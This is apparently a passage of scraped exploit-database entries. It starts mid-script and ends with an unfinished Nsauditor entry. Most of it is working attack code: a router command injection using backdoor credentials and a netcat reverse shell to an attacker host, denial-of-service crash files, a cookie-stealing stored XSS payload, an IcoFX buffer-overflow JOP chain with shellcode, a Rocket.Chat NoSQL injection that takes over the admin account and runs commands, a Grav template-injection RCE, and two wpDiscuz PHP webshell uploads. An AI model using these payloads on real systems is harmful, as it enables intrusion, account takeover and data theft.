passw=args.passw # e8c:e8c are the backdoor administrator creds to Optilink devices # Alternate backdoor credentials are adsl:realtek, admin:admin. user2="e8c" passw2="e8c" home_url="http://"+target[0]+"/boaform/admin/formLogin" print("[+] Trying to authenticate...") # Authenticate ourselves first data={'username':user, 'psd':passw} r=requests.post(home_url,data) res=is_login_success(r) if res: print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"") print("[-] Exploit failed with the following error:") print(res) print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?") val = input("Press y or n : ") if val[0].lower()=="y": print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"") # Authenticate ourselves with new creds data={'username':user2, 'psd':passw2} r=requests.post(home_url,data) res2=is_login_success(r) if res2: print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"") print("[-] Exploit failed with the following error:") print(res2) print("[-] Halting Execution.") exit() else: print("Received input "+val+"") print("[-] Halting Execution.") exit() print("[+] Looks like authentication was succesful!") print("[+] Trying to fetch the WAN Name...") # Fetching Wan Name # wan_name="1_INTERNET_R_VID_***" get_wan_url = "http://"+target[0]+"/diag_ping.asp" r=requests.get(get_wan_url) match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text) wan_name=match[0] print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..") print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*") print("[+] If everything went right, you should've gotten a shell right now!") # Starting Exploitation # The same vulnerability exists in formPing and formTracert. 
# exploit_url = "http://"+target[0]+"/boaform/admin/formPing" exploit_url = "http://"+target[0]+"/boaform/admin/formTracert" # Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :) # BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it. # The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload. # https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox post_data='target_addr="1.1.1.1+`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+'+lhost[0]+'+'+lport[0]+'+>/tmp/f`"&waninf='+wan_name+'"' r=requests.post(exploit_url,post_data)
-
My Notes Safe 5.3 - Denial of Service (PoC)
# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 # Version: 5.3 # Category: DoS (iOS) ##### Vulnerability ##### My Notes Safe is vulnerable to a DoS condition when a very long string of characters is entered while creating a note: # STEPS # # Open the program. # Create a new Note. # Run the Python script payload.py; it creates a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content of payload.txt twice into the new Note. # Crash. Successful exploitation causes the application to stop working. This was tested against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)
# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010 # Version: 1.4.2 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long string of characters is used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the Python exploit script payload.py; it creates a new payload.txt file. # Copy the content of the file "payload.txt". # Paste the content from payload.txt twice in the new Note. # Crashed. Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS) # Exploit Author: Hardik Solanki # Date: 05/06/2021 # Software Link: https://wordpress.org/plugins/smart-slider-3/ # Version: 3.5.0.8 # Tested on Windows How to reproduce the vulnerability: 1. Install WordPress 5.7.2 2. Install and activate the "Smart Slider 3" plugin, version 3.5.0.8 3. Navigate to "Dashboard" and create a "New Project". 4. Enter the JavaScript payload "<script>alert(document.cookie)</script>" into the "Name" field. 5. Observe that the Project has been created with the JavaScript payload "<script>alert(document.cookie)</script>" stored in its name, and that the stored payload executes. XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website
IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP
# Exploit Title: IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP # Date: 2020-05-20 # Exploit Author: Austin Babcock # Vendor Homepage: https://icofx.ro/ # Software Link: https://drive.google.com/file/d/1SONzNStA_W3pAPU5IUvsYS3z0jYymEZn/view?usp=sharing # Version: 2.6.0.0 # Tested on: Windows 7 Ultimate x64 # CVE: CVE-2013-4988 # Steps: 1. Run script 2. Open application 3. Open maliciousJOP.ico via file -> open dropdown menu # Payload Length: 1626 bytes #While this is an older CVE, it is very rare to have a JOP chain available for a binary, which is what this exploit attempts to demonstrate. #Gadgets were found using the JOP ROCKET tool, which is available at https://github.com/Bw3ll/JOP_ROCKET #This exploit utilizes ROP to set up a JOP chain that will perform multiple stack pivots and call VirtualProtect(). #JOP utilizes a dispatcher gadget (#add ecx, dword ptr [eax] #jmp dword ptr [ecx]) to execute gadgets found within the dispatch table. #The ECX register will hold the address of the dispatch table, which will be modified each time the dispatcher gadget executes. #After each modification, ECX will point to the address of the next gadget in the JOP chain and "jmp dword ptr [ecx]" executes that gadget. #Each functional gadget must end in a jmp or call to a register containing the address of the dispatcher gadget. #In this exploit, ecx is used to hold the address of the dispatch table, and edi is used to hold the dispatcher gadget address. #The dispatch table is located just after the shellcode in this exploit's payload. The address is loaded into ECX using ROP to programmatically generate the correct address. 
#!/usr/bin/python2 import struct # Stuff we'll need for creating our malicious .ico header = "\x00\x00\x01\x00\x00\x6F" option = "\x02\x00\x00\x00" pad2 = "\x41"*8 nseh = "\xfe\xff\xff\xff" base = 0x400000 # SEH Overwrite with stack pivot - ADD ESP,0x800 # POP EBX # RET seh = struct.pack('<L', 0x0044f012) ########################### #### LOAD DISPATCH TABLE ADDR INTO ECX #### #The dispatch table's address is calculated based off of the value of EBP, which is related to the paylaod's location in memory. jopSetup = struct.pack('<I',0x00580ca8) # POP ECX # RETN <- jopSetup += struct.pack('<I',0x0000000) #clear ecx jopSetup += struct.pack('<I', base + 0x000e8643) # ADD ECX,EBP # RETN jopSetup += struct.pack('<I', base + 0x00007c03) # POP EAX # RETN jopSetup += struct.pack('<I',0x00009f0) # offset for disp table jopSetup += struct.pack('<I', base + 0x00007c63) # ADD ECX,EAX # RETN # ecx = disp table #### LOAD ADD VALUE PTR INTO EAX #### #Since the dispatcher gadget uses the instruction "add ecx, dword ptr[eax]" to modify the address of the dispatch table, #eax must point to a valid location in memory containing the value we want to add to ecx each time the dispatcher executes. #In this case, eax will point to an address containing the value 0x00000004. jopSetup += struct.pack('<I', base + 0x0029c000) # MOV EAX,ECX # POP ESI # RETN <- jopSetup += struct.pack('<I',0x0000000) # junk jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN #### LOAD WRITABLE ADDR OFFSET INTO EBX #### #The gadget used for stack pivoting has an extra instruction (or byte ptr [ebx - 0x781703bb]) that cannot be avoided. 
#In order to ensure this instruction does not cause problems, ebx-0x781703bb must point to a writable section of memory so #that the instruction does not cause an access violation. This section makes sure ebx contains a compatible value. jopSetup += struct.pack('<I', base + 0x00390000) # POP EBX # RETN jopSetup += struct.pack('<I', 0x78c0609a) # needed for stack pivot JOP gadget -- offset to writable addr #### LOAD DISPATCHER ADDR INTO EDI #### jopSetup += struct.pack('<I',base + 0x00051423) # POP EDI # RETN jopSetup += struct.pack('<I',base + 0x6d81) # disp gadget address #Dispatcher: #add ecx, dword ptr [eax] 0x406d81 (offset 0x6d81) #jmp dword ptr [ecx] #### BEGIN JOP -- PERFORM STACK PIVOT #### jopSetup += struct.pack('<I', base + 0x1623) # JMP EDI table = struct.pack('<I',0x44444444) # padding #PIVOT 40 BYTES #Last POP will put VP ptr in EBP for i in range(10): table += struct.pack('<I', 0x588b9b) #pop ebp # or byte ptr [ebx - 0x781703bb], cl # jmp edi <- #### CALL VirtualProtect() #### #The derferencing gadget used to call VirtualProtect() has an offset of -0x71 bytes from ebp. #To account for this, when the pointer for VirtualProtect() is loaded into ebp, 0x71 bytes are added to it in order #to ensure that ebp-0x71 is the correct value for the pointer. This can be seen below. 
table += struct.pack('<I',0x4c8eb7) #jmp dword ptr [ebp - 0x71] <- # VP ptr + offset for jmp ebp gadget vpPtr = struct.pack('<I',0x00bf6668 + 0x71) ############################################################################################ msg_sc = ("\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B\x12\x80" "\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20\x01\xC7\x31\xED" "\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E\x08\x45\x78\x69\x74\x75" "\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68" "\x50\x21\x20\x01\x68\x78\x20\x4A\x4F\x68\x49\x63\x6F\x46\x89\xE1\xFE\x49\x0B\x31\xC0\x51" "\x50\xFF\xD7") # ExitProcess(0); exit_sc = "\x31\xc0\x50\xb8\x00\x60\xbf\x00\xff\x10" addesp = "\x81\xec\x00\x10\x00\x00" # Stack pivot at start of shellcode shellcode = addesp + msg_sc + exit_sc nopwrap = "\x90"*(0x168 - len(shellcode)) + shellcode + "\x90"*0x20 # padding until VP parameter location paramPad = "C" *(36) paramPad += vpPtr ### VIRTUAL PROTECT PARAMETERS ### vpParams = struct.pack('<I',0x18f744) #return addr vpParams += struct.pack('<I',0x18f744) #lpAddr vpParams += struct.pack('<I',0x500) #dwSize vpParams += struct.pack('<I',0x40) #flNewProt vpParams += struct.pack('<I',0x00bf4d0a) #lpfOldProtect # pad1 holds JOP Setup chain, VP() Parameters, Shellcode, Value for ADD, and Dispatch Table pad1 = "A"*580 + jopSetup + paramPad + vpParams + nopwrap addVal = struct.pack('<I',0x00000004) # how much for disp gadget to add to Dispatch Table address pad1 += addVal pad1 += table # dispatch table pad1 += "B"*(0x640-len(pad1)) # Piece together our exploit payload = header + pad1 + option + pad2 + nseh + seh # Write out our malicious file writeFile = open ("maliciousJOP.ico", "wb") writeFile.write( payload ) writeFile.close()
Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)
# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat 3.12.1 # CVE: CVE-2021-22911 # Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = 
'{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # 
Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting reset token token = resettoken(target) ## 
Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticting and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd)
Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)
# Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated) # Author: enox # Date: 06-06-2021 # Vendor: https://getgrav.org/ # Software Link: https://getgrav.org/download/core/grav-admin/1.7.10 # Vulnerable Version(s): Grav CMS 1.7.10 # CVE: CVE-2021-29440 # Credits: https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities # NOTES: You need a user who has access to /admin dashboard with page creation privileges. #!/usr/bin/python import requests from bs4 import BeautifulSoup import random import string username = 'username' password = 'password' url = 'http://grav.local' session = requests.Session() # Autheticating ## Getting login-nonce def login(url,username,password): r = session.get(url + "/admin") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[2]) nonce = nonce[47:79] ## Logging in payload =f'data%5Busername%5D={username}&data%5Bpassword%5D={password}&task=login&login-nonce={nonce}' headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = session.post(url+"/admin",data=payload,headers=headers) # Creating Page for RCE def rce(url,cmd): ## Getting form nonce and unique form id project_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 8)) r = session.get(url+f"/admin/pages/{project_name}/:add") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[72]) form_id = str(soup.findAll('input')[71]) form_id = form_id[54:86] nonce = nonce[46:78] ## Creating Page headers = {'Content-Type': 'application/x-www-form-urlencoded'} payload = 
f'task=save&data%5Bheader%5D%5Btitle%5D={project_name}&data%5Bcontent%5D=%7B%7B+system%28%27{cmd}%27%29+%7D%7D&data%5Bfolder%5D={project_name}&data%5Broute%5D=&data%5Bname%5D=default&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&toggleable_data%5Bheader%5D%5Bprocess%5D=on&data%5Bheader%5D%5Bprocess%5D%5Btwig%5D=1&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={form_id}&form-nonce={nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&data%5Bheader%5D%5Bprocess%5D%5Bmarkdown%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0' r = session.post(url+f"/admin/pages/{project_name}/:add",data=payload,headers=headers) ## Getting command output r = session.get(url+f"/{project_name.lower()}") if 'SyntaxError' in r.text: print("[-] Command error") else: a = r.text.split('<section id="body-wrapper" 
class="section">') b = a[1].split('</section>') print(b[0][58:]) # Cleaning up ## Getting admin-nonce r = session.get(url + "/admin/pages") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[32]) nonce = nonce[47:79] ## Deleting Page r = session.get(url+f"/admin/pages/{project_name.lower()}/task:delete/admin-nonce:{nonce}") login(url,username,password) while True: cmd = input("$ ") rce(url,cmd)
NBMonitor 1.6.8 - Denial of Service (PoC)
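# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.8
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Go to Register > Enter Registration Code...
#3.- Write anything in 'Name' field
#4.- Paste clipboard in 'Key' field
#5.- Click on button -> Ok

# NOTE(review): step 1 speaks of a *printed* string, but this script only
# writes it to NBM.txt in the current directory; open that file to copy it.
# The whole PoC is a 256-byte run of 'A' (0x41); nothing is sent or executed.
buffer = "\x41" * 256

# Context manager so the handle is closed even if the write raises
# (the original open()/write()/close() sequence leaked it on error).
with open("NBM.txt", "w") as f:
    f.write(buffer)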
Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)
# Exploit Title: Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated) # Google Dork: inurl:/wp-content/plugins/wpdiscuz/ # Date: 2021-06-06 # Original Author: Chloe Chamberland # Exploit Author: Juampa Rodríguez aka UnD3sc0n0c1d0 # Vendor Homepage: https://gvectors.com/ # Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip # Version: 7.0.4 # Tested on: Ubuntu / WordPress 5.6.2 # CVE : CVE-2020-24186 #!/bin/bash if [ -z $1 ] then echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n" exit 0 elif [ -z $2 ] then echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n" exit 0 else post=$(curl -sI http://$1$2/ | head -n1) if [[ "$post" == *"200 OK"* ]]; then wmu_nonce=$(curl -s http://$1$2/ | sed -r "s/wmuSecurity/\nwmuSecurity/g" | grep wmuSecurity | cut -d '"' -f3) webshell=$(curl -isk -X 'POST' -H 'X-Requested-With: XMLHttpRequest' -H 'Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundaryUnD3s' --data-binary $'-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0awmuUploadFiles\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_nonce\"\x0d\x0a\x0d\x0a'$wmu_nonce$'\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmuAttachmentsData\"\x0d\x0a\x0d\x0aundefined\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"a.php\" Content-Type: image/jpeg\x0d\x0a\x0d\x0aGIF8\x0d\x0a<?php\x0d\x0aif(isset($_REQUEST[\'cmd\'])){\x0d\x0a $cmd = ($_REQUEST[\'cmd\']);\x0d\x0a system($cmd);\x0d\x0a die;\x0d\x0a}\x0d\x0a?>\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"postId\"\x0d\x0a\x0d\x0a18\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s--\x0d\x0a' 
http://$1/wp-admin/admin-ajax.php | sed 's/\":"\http/\nhttp/g' | grep "http\:\\\\/" | cut -d '"' -f1 | sed 's/\\//g') echo -e "\nWebshell:" $webshell"\n" echo -e "--------------WIN--------------" echo -e " ¡Got webshell! " echo -e "-------------------------------\n" while : do read -p '$ ' command curl -s $webshell?cmd=$command | grep -v GIF8 done else echo -e "\n[!] The indicated post was not found\n" fi fi
WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)
# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated) # Date: 2021/06/08 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://gvectors.com/ # Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip # Version: wpDiscuz 7.0.4 # Tested on: Debian9, Windows 7, Windows 10 (Wordpress 5.7.2) # CVE : CVE-2020-24186 # Thanks for the great contribution to the code: Z3roC00l (https://twitter.com/zeroc00I) #!/bin/python3 import requests import optparse import re import random import time import string import json parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://192.168.1.81/blog") parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /2021/06/blogpost") options, args = parser.parse_args() if not options.url or not options.path: print('[+] Specify an url target') print('[+] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost') print('[+] Example help usage: exploit.py -h') exit() session = requests.Session() main_url = options.url path = options.path url_blog = main_url + path clean_host = main_url.replace('http://', '').replace('/wordpress','') def banner(): print('---------------------------------------------------------------') print('[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution') print('[-] File Upload Bypass Vulnerability - PHP Webshell Upload') print('[-] CVE: CVE-2020-24186') print('[-] https://github.com/hevox') print('--------------------------------------------------------------- \n') def csrfRequest(): global wmuSec global wc_post_id try: get_html = session.get(url_blog) response_len = str(len(get_html.text)) response_code = str(get_html.status_code) print('[+] Response length:['+response_len+'] | code:['+response_code+']') raw_wmu = get_html.text.replace(',','\n') wmuSec = re.findall('wmuSecurity.*$',raw_wmu,re.MULTILINE)[0].split('"')[2] 
print('[!] Got wmuSecurity value: '+ wmuSec +'') raw_postID = get_html.text.replace(',','\n') wc_post_id = re.findall('wc_post_id.*$',raw_postID,re.MULTILINE)[0].split('"')[2] print('[!] Got wmuSecurity value: '+ wc_post_id +' \n') except requests.exceptions.ConnectionError as err: print('\n[x] Failed to Connect in: '+url_blog+' ') print('[x] This host seems to be Down') exit() def nameRandom(): global shell_name print('[+] Generating random name for Webshell...') shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15))) time.sleep(1) print('[!] Generated webshell name: '+shell_name+'\n') return shell_name def shell_upload(): global shell print('[!] Trying to Upload Webshell..') try: upload_url = main_url + "/wp-admin/admin-ajax.php" upload_cookies = {"wordpress_test_cookie": "WP%20Cookie%20check", "wpdiscuz_hide_bubble_hint": "1"} upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------2032192841253859011643762941", "Origin": "http://"+clean_host+"", "Connection": "close", "Referer": url_blog} upload_data = "-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwmuUploadFiles\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_nonce\"\r\n\r\n"+wmuSec+"\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\r\n\r\n\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\""+shell_name+".php\"\r\nContent-Type: image/png\r\n\r\nGIF689a;\r\n\r\n<?php system($_GET['cmd']); 
?>\r\n\x1a\x82\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"postId\"\r\n\r\n"+wc_post_id+"\r\n-----------------------------2032192841253859011643762941--\r\n" check = session.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) json_object = (json.loads(check.text)) status = (json_object["success"]) get_path = (check.text.replace(',','\n')) shell_pret = re.findall('url.*$',get_path,re.MULTILINE) find_shell = str(shell_pret) raw = (find_shell.replace('\\','').replace('url":"','').replace('\',','').replace('"','').replace('[\'','')) shell = (raw.split(" ",1)[0]) if status == True: print('[+] Upload Success... Webshell path:' +shell+' \n') else: print('[x] Failed to Upload Webshell in: '+ url_blog +' ') exit() except requests.exceptions.HTTPError as conn: print('[x] Failed to Upload Webshell in: '+ url_blog +' ') return shell def code_exec(): try: while True: cmd = input('> ') codex = session.get(shell + '?cmd='+cmd+'') print(codex.text.replace('GIF689a;','').replace('�','')) except: print('\n[x] Failed to execute PHP code...') banner() csrfRequest() nameRandom() shell_upload() code_exec()
Nsauditor 3.2.3 - Denial of Service (PoC)
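# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.3.0
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
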